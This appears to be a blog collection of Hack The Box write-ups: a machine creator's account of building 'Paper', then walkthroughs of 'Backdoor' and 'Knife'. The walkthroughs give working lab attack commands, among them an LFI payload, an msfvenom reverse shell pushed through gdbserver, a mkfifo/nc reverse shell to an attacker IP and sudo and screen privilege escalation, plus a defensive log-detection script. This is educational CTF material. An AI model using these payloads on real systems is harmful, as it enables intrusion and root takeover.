The Idea Behind Paper

Prelude

It was a usual morning for me. I’d had my coffee and I was sitting in front of my computer, still recovering from my sleep. Usually it would be time for me to select a box from Hack The Box and spend the rest of the day understanding, taking notes, getting defeated, getting frustrated, and finally defeating the box.

From the first time I watched an IppSec video, I’ve had this itch in my brain to just go ahead and create a box.

At first, I could easily ignore it because I was a total beginner with no real experience with hacking. But it has been more than 3 years, on and off, since I began, and at the very least I knew how to perform basic enumeration.

As my number of root owns grew, that urge just got more and more annoying, and the last straw came from Reddit last night.

I had been thinking to myself for months that if I created a box, the root part should be a somewhat recent vulnerability that could be exploited with or without a script. And last night I got news from Reddit that a vulnerability in Polkit had been disclosed and the author had released a PoC for it. I checked the blog, and it was a simple, yet cool vulnerability.

So there was no excuse for me to back off now, and I got a rush of adrenaline in the middle of the night to go ahead and create this box.

I was always like this. I needed random motivation like this to keep working.

So I decided to take a break from my CTF routine and began developing the box.

Part #1 Making an automated version of the exploit

The exploit I found was CVE-2021-3560, a privilege escalation vulnerability in Polkit, which affected CentOS, Fedora and Ubuntu distros. This was before the pwnkit era and I was very excited about this vulnerability.

This vulnerability is a race condition in the Polkit service, which can be exploited manually, without any script.

The original research article had a PoC to do that, but it required some timing calculations by hand. So I decided to create a script to automate the process.

So I spent some time creating the script, and just as I was about to submit my exploit script to Exploit-DB, there was already an exploit script published there.

Sure, I was a little sad. But the exploit development was a great learning experience for me and I enjoyed every bit of it! I would suggest that fellow newbies like me try to re-write an exploit script for a vulnerability of their choice.

Now, since there was already an exploit script available on Exploit-DB, I published my version of the exploit on GitHub and decided to move on to creating the actual box.

Part #2 Choosing the right distro

For me, this was actually one of the most difficult parts of creating the VM.

At first, I decided to go with Ubuntu, as I’m pretty comfortable working with Debian-based distros. However, that decision cost me several wasted hours, which I’ll explain in a minute.

I had two options to start with.

  • Download a VM image from the internet and modify it according to my liking
  • Start from scratch and create a new VM using an ISO

Of course, I didn’t want to waste too much time on tinkering with VM settings. So I chose Method #1.

But that’s not the right method to go with when creating HTB machines.

OSBoxes images have the maximum storage size set to more than 10GB, and it is a pain to shrink a virtual disk after it has been expanded. So the better option is to create a VM with a 10GB disk and install the OS from an ISO.

I downloaded a pre-built VM image from osboxes.org.

Then I tested the VM with the Polkit privesc script and it worked like a charm.

Being happy with the result, I moved on to the user part and finished configuring everything. Once everything was configured, I decided to test the privesc once again, just to be sure.

That’s where the trouble began. The privesc wasn’t working. At all!

I thought something had changed in the background while I was configuring the user part of the box, or that Ubuntu had updated in the background, thereby patching the vulnerability.

So I spawned another instance of the same OSBoxes image I had downloaded, disabled updates, tested the privesc script to make sure that everything was working, and configured everything from scratch again.

After everything had been carefully configured, I tested the privesc once again and, just like before, the privesc didn’t work!

I was losing my patience. This meant that Ubuntu had silently updated in the background, even after I had disabled automatic updates. Although it was great for security, this was a nightmare experience for me!

That’s the point where I’ve decided to go with CentOS and CentOS was a good boi, in every way!

I created a new VM with a 10GB disk (the HTB size limit for Linux machines), installed CentOS from the ISO image, and disabled automatic updates in CentOS.

And CentOS did just what I told him to do!

Then I’ve started configuring the User part of the box for hopefully the last time.

Part #3 The idea behind the user part

My idea was simple (kinda)

There should be some sort of human-like interaction element, and there should be some interesting real-life element to teach the player. So this machine could be a mixture of both real-life and CTF elements.

There was also an idea to bring in social engineering elements, but since it could take too much time and I was not entirely sure about the idea, I dropped it for now. I might revisit this idea later.

To teach the player about a real-life element, I decided to include a specific header, X-Backend-Server. It is a custom server header from the X- header family, the prefix that by convention marks a non-standard, custom header.

Headers like X-Backend-Server are a real-life aspect of bug hunting, and they can potentially reveal hidden backend systems.

Now for the interaction part, I looked for open-source chat systems and found RocketChat. It was the perfect one for my use case: extensible and simple to use.

Once RocketChat was set up, I noticed that the RocketChat menu looked dull. So I brainstormed about things that could spice it up a little, and suddenly it clicked.

What if I could see the chat transcript of some of my favourite characters?

And that’s how the Office theme came in!

Full disclosure: I spent way more time on Office-theming the machine than on the actual exploitable parts.

It was hard, but in the end I was satisfied!

Some pitfalls of the machine

The recyclops bot had an RCE vulnerability that I overlooked. For listing files, I used a wrapper script to execute code.

Path /home/dwight/hubot/scripts/run.js

I tried my best to lock down the code execution capabilities to just viewing the user.txt file.

And I was successful in that. But there was another vulnerability: anyone who enumerated the name of the wrapper script could execute code on the machine by calling the wrapper script by name.

For example, a user could execute code by using the following command.

run <command>

I know at least one person who got user this way.

Kudos to HTB user new2u for this find!

This was a pretty obvious vulnerability and I feel pretty happy that someone found this!

Another issue with the machine was that the HTB staff had made some changes to the root part to make the machine more stable. They used a cleanup script that restores /etc/passwd every 2 minutes to keep the machine exploitable for all users.

Though the intention was good, 2 minutes is far too little time for exploitation, in my opinion. I got many messages from people who were struggling to log in to the machine as the newly created user.

The players would often find the newly created user getting deleted before they could even enter the password.

If you ask me, I’d say that the number should’ve been at least 5 minutes, which would give the player ample time to win the race condition and login as the new user.

Another small issue I found: I intended the drafts to reveal the registration code for RocketChat without revealing the full URL, kind of like the following, so that the players would need to find RocketChat by subdomain enumeration.

# Secret Registration URL of new Employee chat system

<Internal-chat-application-URL>/register/8qozr226AhkCHZdyY

But HTB staff changed it to the full RocketChat URL.

Not a huge issue and I’m nitpicking here, but just wanted to let you know what the initial design of the user part was supposed to be.

Easter Egg Time!

Below are the easter eggs I’ve included in the machine.

1. Actual transcript of Creedblogs

2. Michael’s promotion picture and his famous quotes

3. Nick is the name of the 8th system admin of Dunder Mifflin

4. The usernames and display pictures (DP) of RocketChat users

5. DunMiff/Sys is the computer, who just became self aware

6. Identity theft is not a joke, guys!

7. A Hidden easter egg!

Postlude

And that was my whole thought process behind creating the Paper machine!

I’m really glad you guys liked the machine despite the initial mishap at the machine’s release.

I would like to personally thank each and every one of the guys who solved the box, the ones who appreciated me, the ones who criticized me, the ones who enjoyed solving the machine and the ones who left a review for the box!

Never in my dreams would I have expected such a response to my machine, and I feel really happy reading all of your responses.

I really hope I can continue being a part of such an amazing infosec community with more and greater contributions than this.

Peace out! ✌️

Hack The Box: Backdoor

Prelude

Backdoor was an easy machine from HTB, developed by hkabubaker17. The initial foothold vector was pretty cool: we need to enumerate the running processes of the target machine using an LFI vulnerability present in a WordPress plugin. Once we have enumerated the processes, we’ll find that one of the open ports is gdbserver’s remote debugging port.

We can then connect to that port and execute a malicious ELF file to gain a reverse shell on the target. After that, we can see that there’s a screen session running as root which is accessible to the low-privileged user. We can then attach to that root screen session to escalate privileges.

Let me elaborate on how I solved this box.

Exploitation

Nmap returned the following results.

Nmap scan report for 10.10.11.125
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
|   256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_  256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Backdoor – Real-Life
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are 3 open ports, including a peculiar port 1337. I tried banner grabbing the port with nc, but it didn’t display any banner after connecting to it.

So, I directed the enumeration to port 80.

I navigated to http://10.10.11.125/index.php/ and found a WordPress page.

Clicking Home navigated to backdoor.htb.

So, to test virtual host routing, I added an entry to /etc/hosts and refreshed the page, but nothing changed.

I then ran wpscan with the scan mode set to aggressive. But it didn’t find anything useful, except that the site has directory listing enabled.

So, with the help of this blog, I started manual enumeration of the WordPress plugins by navigating to the /wp-content/plugins directory to view the installed plugins. Since directory listing is enabled, we should get a list of installed plugins.

I navigated to http://backdoor.htb/wp-content/plugins/ and found the following.

I searched the plugin name in searchsploit and sure enough, there’s a hit!

I found an exploit for an LFI vulnerability in the plugin ebook-download.

I confirmed the vulnerability by using the following payload.

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

I got the credentials to the MySQL service from wp-config.php. So, I tried the credentials in the SSH service, but they didn’t work.

Then I decided to enumerate the target further, by leveraging the LFI vulnerability we have at hand.

I found a GitHub repo with scripts to enumerate a machine via an LFI vulnerability.

I used the following command to run the network-info script.

bash network-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='

And it parsed the output of the /proc/net/tcp file into a human-readable format. Cool!

Then I used the process-info script, which brute-forces the /proc/$pid/cmdline location to enumerate the running processes.

However, the target server didn’t respond to /proc/sys/kernel/max_pid.
The script uses the contents of this file to determine the maximum number of brute-force attempts to perform, and because the target server didn’t respond for this file, I modified the script a little to use my own machine’s max_pid.

I ran it using the following command.

bash process-info 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=' > out.txt

After saving the raw PID brute-forcing output to out.txt, I stripped the unwanted strings with the following bash one-liner, writing the result to a file named test.out.

cat out.txt|sed -e 's:/proc/[0-9]\{1,6\}/cmdline::g' -e 's:<script>window.close()</script>::g' -e 's/PID:\ [0-9]\{1,5\}//g' > test.out

I used the following command to save it into a new file named test2.out with line numbers, so that line number = PID.

cat test.out|grep -n . > test2.out 

Then I deleted the lines that don’t contain any letters, so that the empty entries are dropped.

cat test2.out|sed -e '/[a-z]/!d' > pids

Now, I have the complete process list of the target.

Two processes look interesting!

This output shows that port 1337 is opened by gdbserver.
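From the defender’s side, the enumeration above leaves a very recognisable trail in the web server log: one client hammering filedownload.php with ../ payloads that resolve under /proc. The following is an added example, not part of the original write-up, that parses constructed Apache access-log lines and flags that pattern (parseAccessLine, classify, analyseLog, SAMPLE_LOG and the threshold value are assumptions).

```javascript
// Added example (not from the original write-up): detection for the LFI-based
// /proc enumeration, run over constructed Apache access-log lines. Assumed
// names: parseAccessLine, classify, analyseLog, SAMPLE_LOG, PROC_PROBE_THRESHOLD.
const LFI_ENDPOINT = "/wp-content/plugins/ebook-download/filedownload.php";
const PARAM = "ebookdownloadurl";
const PROC_PROBE_THRESHOLD = 5; // assumed tuning value for the brute-force verdict
// Combined Log Format: host ident user [time] "method url proto" status bytes ...
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

// Returns {ip, method, path, query, status}, or null for a malformed line.
function parseAccessLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [path, query = ""] = m[4].split("?", 2);
  return { ip: m[1], method: m[3], path, query, status: m[5] };
}

// "proc_probe" when the requested file resolves under /proc, "traversal" for
// any other ../ or absolute path, null otherwise. URLSearchParams decodes one
// layer of percent-encoding; the second decode catches double-encoded input.
function classify(req) {
  if (req.path !== LFI_ENDPOINT) return null;
  const target = new URLSearchParams(req.query).get(PARAM);
  if (target === null) return null;
  let decoded;
  try { decoded = decodeURIComponent(target); } catch (e) { decoded = target; }
  const normalized = decoded.replace(/^(\.\.\/)+/, "/");
  if (normalized.startsWith("/proc/")) return "proc_probe";
  if (decoded.includes("../") || decoded.startsWith("/")) return "traversal";
  return null;
}

// Groups hits per source address: many /proc probes from one address is the
// signature of the PID brute force; a lone ../ request is a plain LFI attempt.
function analyseLog(text) {
  const byIp = {};
  for (const line of text.split("\n")) {
    const req = parseAccessLine(line);
    const kind = req && classify(req);
    if (!kind) continue;
    const e = byIp[req.ip] || (byIp[req.ip] = { traversals: 0, procProbes: 0 });
    if (kind === "proc_probe") e.procProbes += 1; else e.traversals += 1;
  }
  for (const e of Object.values(byIp)) {
    e.verdict = e.procProbes >= PROC_PROBE_THRESHOLD ? "pid_bruteforce" : "lfi_attempt";
  }
  return byIp;
}

// Constructed sample log: one legitimate download, one wp-config.php read and
// five /proc probes (one percent-encoded) from the same address.
const U = "/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=";
const SAMPLE_LOG = [
  '10.0.0.9 - - [10/Jan/2022:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  `10.0.0.9 - - [10/Jan/2022:10:00:01 +0000] "GET ${U}book.pdf HTTP/1.1" 200 9000 "-" "Mozilla/5.0"`,
  `10.0.0.5 - - [10/Jan/2022:10:00:02 +0000] "GET ${U}../../../wp-config.php HTTP/1.1" 200 3110 "-" "curl/7.74.0"`,
  `10.0.0.5 - - [10/Jan/2022:10:00:03 +0000] "GET ${U}../../../proc/1/cmdline HTTP/1.1" 200 40 "-" "curl/7.74.0"`,
  `10.0.0.5 - - [10/Jan/2022:10:00:04 +0000] "GET ${U}../../../proc/2/cmdline HTTP/1.1" 200 40 "-" "curl/7.74.0"`,
  `10.0.0.5 - - [10/Jan/2022:10:00:05 +0000] "GET ${U}%2e%2e%2f%2e%2e%2f%2e%2e%2fproc%2f3%2fcmdline HTTP/1.1" 200 40 "-" "curl/7.74.0"`,
  `10.0.0.5 - - [10/Jan/2022:10:00:06 +0000] "GET ${U}../../../proc/net/tcp HTTP/1.1" 200 1200 "-" "curl/7.74.0"`,
  `10.0.0.5 - - [10/Jan/2022:10:00:07 +0000] "GET ${U}../../../proc/self/status HTTP/1.1" 200 900 "-" "curl/7.74.0"`,
].join("\n");
```

Point analyseLog at a real access log and the per-address verdicts are what you would feed to an alert; the threshold is deliberately low because a legitimate ebook download never carries ../ at all.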

gdbserver is a program used for remote debugging: GDB runs on one machine and the program being debugged runs on another, connected over the network.

So, to confirm that I could connect to the gdb session, I started gdb and typed the following command to connect my client to the remote debugging session.

target remote 10.10.11.125:1337

Neat!

I then quit gdb and did some research on how to upgrade this gdb session to code execution.

By referring to this HackTricks page, I managed to get a reverse shell from this gdbserver session. I took the following steps to get a reverse shell from the remote gdb session.

I created an ELF binary and uploaded it using gdb.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.75 LPORT=9001 PrependFork=true -f elf -o binary.elf

Then I made it executable.

chmod +x binary.elf

Then I opened the file in gdb.

gdb binary.elf

After that, I uploaded the binary and executed it using gdb.

# Set remote debugger target
target extended-remote 10.10.11.125:1337

# Upload elf file
remote put binary.elf binary.elf

# Set remote executable file
set remote exec-file /home/user/binary.elf

# Execute reverse shell executable
run

And I got a shell back!


Privilege Escalation

From the early enumeration, I saw that there’s a screen session running under the root user. For the uninitiated, Screen or GNU Screen is a terminal multiplexer, a software application that can be used to multiplex several virtual consoles, allowing a user to access multiple separate login sessions inside a single terminal window, or to detach and reattach sessions from a terminal.

The root user had an ACL set for user in /root/.screenrc.

This allows the user to fully access the root user’s screen session.

Now, this file isn’t accessible to low-privileged users. Nevertheless, I decided to test whether the low-privileged user had access to the active root session.

I tested this using the following command.

screen -r root/root

The syntax is as follows:

screen -r <owner>/<screen-session-name>

And I got into a root screen session!

w00t up!

Postlude

And that was Backdoor!

A great machine that demonstrated how cool enumeration can be!

Kudos to hkabubaker17 for building such an awesome box!

Peace out! ✌️

Hack The Box: Knife

Prelude

Knife was a simple box from HTB, developed by MrKN16H. This was the easiest box I’ve ever seen from HTB, and this machine marked my fastest rooting time by far. But still, this machine was a good learning experience, and it is the first CTF box I encountered that implemented a recent backdoor vulnerability. For privilege escalation, this machine required knowledge of a new tool which I wasn’t aware of, but it wasn’t that hard to learn the required syntax. Overall, I liked this box and I’d say that this is the perfect beginner box available right now on HTB.

Let’s start the exploitation.

Exploitation

As usual I started the exploitation with Nmap scan.

nmap -sCV -v -oN tcp 10.10.10.242

And I got the scan result as follows.

# Nmap 7.91 scan initiated Fri May 28 12:54:35 2021 as: /usr/bin/nmap -sCV -v -oN tcp 10.10.10.242
Increasing send delay for 10.10.10.242 from 0 to 5 due to 236 out of 786 dropped probes since last increase.
Nmap scan report for 10.10.10.242
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that there are only two open ports.

And from the SSH banner, I found out that the target OS is presumably Ubuntu Focal (20.04).

Then I started the enumeration of port 80 by navigating to http://10.10.10.242/index.php in the web browser, and I saw the following page.

So I started a gobuster scan and a nikto scan, and nikto returned the following output.

It showed the PHP version as 8.1.0-dev. So I did a quick Google search for the version and found that this is the version affected by the Zerodium backdoor vulnerability.

I found a Python exploit on Packet Storm Security and ran it using the following command.

python exploit.py http://10.10.10.242/

And I got code execution!

I upgraded the code execution to a full reverse shell by using the following command.

python exploit.py -u http://10.10.10.242 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.37 9001 >/tmp/f'

And got a shell back as james.

Piece of cake!

Privilege Escalation

Issuing sudo -l showed that james could run a program named knife as root.

Knife is a tool from a DevOps automation solution called Chef.

A quick Google search showed that knife can execute Ruby code.

So, I issued the following command to spawn a root shell.

sudo /usr/bin/knife exec -E 'system("/bin/bash -i")'

And I was root!

Say w00t!

Postlude

And that was the box.

Kudos to MrKN16H for creating such a beginner friendly box!

Peace out! ✌️